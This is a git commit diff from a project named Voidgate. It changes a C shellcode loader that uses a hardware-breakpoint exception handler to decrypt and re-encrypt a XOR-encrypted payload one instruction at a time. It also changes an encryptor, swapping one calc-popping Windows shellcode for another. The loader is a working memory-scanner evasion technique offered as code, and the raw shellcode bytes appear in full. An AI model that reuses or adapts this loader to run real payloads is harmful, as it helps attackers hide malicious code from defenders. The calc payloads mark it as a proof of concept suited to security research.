voidgate works

captain-woof · Sep 26, 2024 · c32ca1e · c32ca1e
1 parent fc827fa
commit c32ca1e
Show file tree

Hide file tree

Showing 12 changed files with 45 additions and 58 deletions.
diff --git a/Voidgate/.vs/Voidgate/FileContentIndex/20d9fef3-6f35-4996-9474-36440f065541.vsidx b/Voidgate/.vs/Voidgate/FileContentIndex/20d9fef3-6f35-4996-9474-36440f065541.vsidx
diff --git a/Voidgate/.vs/Voidgate/FileContentIndex/b04cb557-ebea-4ab7-8a60-5dc4949d0563.vsidx b/Voidgate/.vs/Voidgate/FileContentIndex/b04cb557-ebea-4ab7-8a60-5dc4949d0563.vsidx
diff --git a/Voidgate/.vs/Voidgate/v17/.suo b/Voidgate/.vs/Voidgate/v17/.suo
diff --git a/Voidgate/.vs/Voidgate/v17/Browse.VC.db b/Voidgate/.vs/Voidgate/v17/Browse.VC.db
diff --git a/Voidgate/.vs/Voidgate/v17/Browse.VC.db-shm b/Voidgate/.vs/Voidgate/v17/Browse.VC.db-shm
diff --git a/Voidgate/.vs/Voidgate/v17/Browse.VC.db-wal b/Voidgate/.vs/Voidgate/v17/Browse.VC.db-wal
diff --git a/Voidgate/.vs/Voidgate/v17/Browse.VC.opendb b/Voidgate/.vs/Voidgate/v17/Browse.VC.opendb
diff --git a/Voidgate/.vs/Voidgate/v17/DocumentLayout.json b/Voidgate/.vs/Voidgate/v17/DocumentLayout.json
@@ -2,13 +2,13 @@
  "Version": 1,
  "WorkspaceRootPath": "C:\\Users\\captainwoof\\source\\repos\\Voidgate\\",
  "Documents": [
- {
- "AbsoluteMoniker": "D:0:0:{32127966-D89A-47EE-A5DE-535DE58AB251}|Voidgate\\Voidgate.vcxproj|C:\\Users\\captainwoof\\source\\repos\\Voidgate\\Voidgate\\main.c||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
- "RelativeMoniker": "D:0:0:{32127966-D89A-47EE-A5DE-535DE58AB251}|Voidgate\\Voidgate.vcxproj|solutionrelative:Voidgate\\main.c||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
- },
  {
  "AbsoluteMoniker": "D:0:0:{D89C04BD-FD67-4AC9-9354-6E4CEE82F34C}|VoidgateShellcodeEncryptor\\VoidgateShellcodeEncryptor.vcxproj|C:\\Users\\captainwoof\\source\\repos\\Voidgate\\VoidgateShellcodeEncryptor\\main.c||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
  "RelativeMoniker": "D:0:0:{D89C04BD-FD67-4AC9-9354-6E4CEE82F34C}|VoidgateShellcodeEncryptor\\VoidgateShellcodeEncryptor.vcxproj|solutionrelative:VoidgateShellcodeEncryptor\\main.c||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+ },
+ {
+ "AbsoluteMoniker": "D:0:0:{32127966-D89A-47EE-A5DE-535DE58AB251}|Voidgate\\Voidgate.vcxproj|C:\\Users\\captainwoof\\source\\repos\\Voidgate\\Voidgate\\main.c||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+ "RelativeMoniker": "D:0:0:{32127966-D89A-47EE-A5DE-535DE58AB251}|Voidgate\\Voidgate.vcxproj|solutionrelative:Voidgate\\main.c||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
  }
  ],
  "DocumentGroupContainers": [
@@ -18,33 +18,32 @@
  "DocumentGroups": [
  {
  "DockedWidth": 200,
- "SelectedChildIndex": 1,
+ "SelectedChildIndex": 0,
  "Children": [
  {
  "$type": "Document",
- "DocumentIndex": 1,
+ "DocumentIndex": 0,
  "Title": "main.c",
  "DocumentMoniker": "C:\\Users\\captainwoof\\source\\repos\\Voidgate\\VoidgateShellcodeEncryptor\\main.c",
  "RelativeDocumentMoniker": "VoidgateShellcodeEncryptor\\main.c",
  "ToolTip": "C:\\Users\\captainwoof\\source\\repos\\Voidgate\\VoidgateShellcodeEncryptor\\main.c",
  "RelativeToolTip": "VoidgateShellcodeEncryptor\\main.c",
- "ViewState": "AQIAADgAAAAAAAAAAAArwD0AAAA4AAAA",
+ "ViewState": "AQIAAB4AAAAAAAAAAAAAACoAAAACAAAA",
  "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000423|",
  "WhenOpened": "2024-09-23T18:01:14.251Z",
  "EditorCaption": ""
  },
  {
  "$type": "Document",
- "DocumentIndex": 0,
+ "DocumentIndex": 1,
  "Title": "main.c",
  "DocumentMoniker": "C:\\Users\\captainwoof\\source\\repos\\Voidgate\\Voidgate\\main.c",
  "RelativeDocumentMoniker": "Voidgate\\main.c",
  "ToolTip": "C:\\Users\\captainwoof\\source\\repos\\Voidgate\\Voidgate\\main.c",
  "RelativeToolTip": "Voidgate\\main.c",
- "ViewState": "AQIAAE4AAAAAAAAAAAAYwFsAAAAvAAAA",
+ "ViewState": "AQIAAAAAAAAAAAAAAAAAAAQAAAAaAAAA",
  "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000423|",
- "WhenOpened": "2024-09-23T17:26:41.06Z",
- "EditorCaption": ""
+ "WhenOpened": "2024-09-23T17:26:41.06Z"
  }
  ]
  }

diff --git a/Voidgate/.vs/Voidgate/v17/Solution.VC.db-shm b/Voidgate/.vs/Voidgate/v17/Solution.VC.db-shm
diff --git a/Voidgate/.vs/Voidgate/v17/Solution.VC.db-wal b/Voidgate/.vs/Voidgate/v17/Solution.VC.db-wal
diff --git a/Voidgate/Voidgate/main.c b/Voidgate/Voidgate/main.c
@@ -7,7 +7,6 @@ const unsigned char payloadXorEncrypted[] = "\xBC\xF3\x16\xEF\xD4\x51\x6E\x4E\x4
 const unsigned char xorDecryptionKey[] = "\xF4\xC2\xE9\xA7\x23\xB6\x0B\x06\xC9\x15\x29\xE6\x77\xE7\xCB\xD7\xA7\xAB\xEC\x1E\xBB\x46\x7F\xF4\xA8\x36\x4C\xF1\x01\x9B\x13\x6D\x1A\x10\x66\x54\xDA\xCF\x80\x3E\xBF\x08\xBE\x44\xED\x66\x25\x3C\xD1\x4E\xF8\x30\xCF\x71\x7B\xBD\xC6\xCD\x45\xF4\xE4\xA2\xA1\x92\x70\x3E\xD8\xD1\x34\xA2\xCA\x0E\xB3\x28\xE7\x3E\x00\x69\x4C\x00\xB3\x52\x08\x6E\xB0\x1E\x86\x55\x69\x99\xA9\x2B\xF7\xA4\x73\x39\x31\x33\x64\x8A\x10\x3A\x11\x7B\x5D\xBA\x4A\x8B\xE1\x5E\x31\x73\x87\xBA\xA7\x82\x43\xB5\xC5\xA9\xAE\x02\xAD\xD6\xEB\x28\xE8\x5B\x0F\xC9\x8D\xC5\x7F\xBE\xFC\x0A\x5F\xD8\x24\x28\x9B\x30\x94\x12\xF2\x44\x0C\x9B\x45\xCB\xDE\x5A\xC9\x0B\xA1\x6C\x1B\xB3\x86\xD7\xB7\xAB\xD3\x7B\xCD\xF0\x53\x5C\xE7\xEF\xE3\x14\x63\x66\xC0\xE5\x0F\x2E\x3E\xF3\xF0\x0B\xE4\x99\x1F\x38\x09\x4A\x08\xFC\x57\xEC\xCB\x9D\xA3\x1A\xC5\x4D\x76\x36\xD7\xD2\xE2\x21\x4E";
 const unsigned int payloadAndKeyLen = 205;
 
-
 // Global data for Voidgate functions
 const unsigned int maxInstructionLen = 16;
 PVOID payloadXorEncryptedExecutable = NULL;
@@ -46,34 +45,36 @@ Handles the breakpoints for the payload; re-encrypts previous instruction and de
 PVOID prevRip = NULL;
 LONG HardwareBreakpointHandler(PEXCEPTION_POINTERS pExceptionPointers) {
  // If exception came from our single-stepping from inside our payload
- if (pExceptionPointers->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP
- && (pExceptionPointers->ContextRecord->Rip >= (DWORD64)payloadXorEncryptedExecutable
- && pExceptionPointers->ContextRecord->Rip < (DWORD64)payloadXorEncryptedExecutable + payloadAndKeyLen)
- && (pExceptionPointers->ExceptionRecord->ExceptionAddress >= (DWORD64)payloadXorEncryptedExecutable
- && pExceptionPointers->ExceptionRecord->ExceptionAddress < (DWORD64)payloadXorEncryptedExecutable + payloadAndKeyLen)
- ) {
- PCONTEXT pcThread = pExceptionPointers->ContextRecord;
-
- printf("Inside HardwareBreakpointHandler; rip: %p, offset: %d\n", (PVOID)(pcThread->Rip), pcThread->Rip - (DWORD64)payloadXorEncryptedExecutable);
-
- // Re-encrypt previous instruction
- if (prevRip != NULL) {
- for (int i = 0; i < maxInstructionLen; i++) {
- ((unsigned char*)prevRip)[i] ^= xorDecryptionKey[(DWORD64)prevRip - (DWORD64)payloadXorEncryptedExecutable + i];
+ if (pExceptionPointers->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {
+
+ // If exception came from our payload, perform re-encryption and decryption before execution
+ if ((pExceptionPointers->ContextRecord->Rip >= (DWORD64)payloadXorEncryptedExecutable
+ && pExceptionPointers->ContextRecord->Rip < (DWORD64)payloadXorEncryptedExecutable + payloadAndKeyLen)
+ && (pExceptionPointers->ExceptionRecord->ExceptionAddress >= (DWORD64)payloadXorEncryptedExecutable
+ && pExceptionPointers->ExceptionRecord->ExceptionAddress < (DWORD64)payloadXorEncryptedExecutable + payloadAndKeyLen)) {
+ PCONTEXT pcThread = pExceptionPointers->ContextRecord;
+
+ printf("Inside HardwareBreakpointHandler; rip: %p, offset: %d\n", (PVOID)(pcThread->Rip), pcThread->Rip - (DWORD64)payloadXorEncryptedExecutable);
+
+ // Re-encrypt previous instruction
+ if (prevRip != NULL) {
+ for (int i = 0; i < maxInstructionLen; i++) {
+ ((unsigned char*)prevRip)[i] ^= xorDecryptionKey[(DWORD64)prevRip - (DWORD64)payloadXorEncryptedExecutable + i];
+ }
  }
- }
 
- // Decrypt current instruction
- for (int i = 0; i < maxInstructionLen; i++) {
- ((unsigned char*)(pcThread->Rip))[i] ^= xorDecryptionKey[pcThread->Rip - (DWORD64)payloadXorEncryptedExecutable + i];
- }
- prevRip = pcThread->Rip;
+  // Decrypt current instruction
+  for (int i = 0; i < maxInstructionLen; i++) {
+  ((unsigned char*)(pcThread->Rip))[i] ^= xorDecryptionKey[pcThread->Rip - (DWORD64)payloadXorEncryptedExecutable + i];
+  }
+  prevRip = pcThread->Rip;
 
- // Set Resume Flag (RF) in EFlags so we are not stuck in loop
- pExceptionPointers->ContextRecord->EFlags |= 0x10000;
+  // Set Resume Flag (RF) in EFlags so we are not stuck in loop
+  pExceptionPointers->ContextRecord->EFlags |= 0x10000;
 
- // Enabling TF (Trap Flag) in EFlags so that breakpoint handler is triggered for every instruction (step-through)
- pExceptionPointers->ContextRecord->EFlags |= 0x0100;
+ // Enabling TF (Trap Flag) in EFlags so that breakpoint handler is triggered for every instruction (step-through)
+ pExceptionPointers->ContextRecord->EFlags |= 0x0100;
+ }
 
  // Execute current instruction
  return EXCEPTION_CONTINUE_EXECUTION;

diff --git a/Voidgate/VoidgateShellcodeEncryptor/main.c b/Voidgate/VoidgateShellcodeEncryptor/main.c
@@ -44,29 +44,16 @@ void PrintBuffer(IN PCHAR pBuf, IN DWORD pBufSize) {
 }
 
 void main() {
- // Payload to use
+ // Payload to use (pops calc; https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/blob/main/win-x64-DynamicKernelWinExecCalc.asm)
  unsigned char payloadToEncrypt[] =
- "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
- "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
- "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
- "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
- "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
- "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
- "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
- "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
- "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
- "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
- "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
- "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
- "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
- "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
- "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
- "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
- "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
- "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
- "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
- "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
- const unsigned int payloadToEncryptLen = 276;
+ "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
+ "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
+ "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
+ "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
+ "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
+ "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
+ "\x48\x83\xec\x20\x41\xff\xd6";
+ const unsigned int payloadToEncryptLen = 205;
 
  // Generate encryption key
  PCHAR pXorKey = VirtualAlloc(NULL, payloadToEncryptLen, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);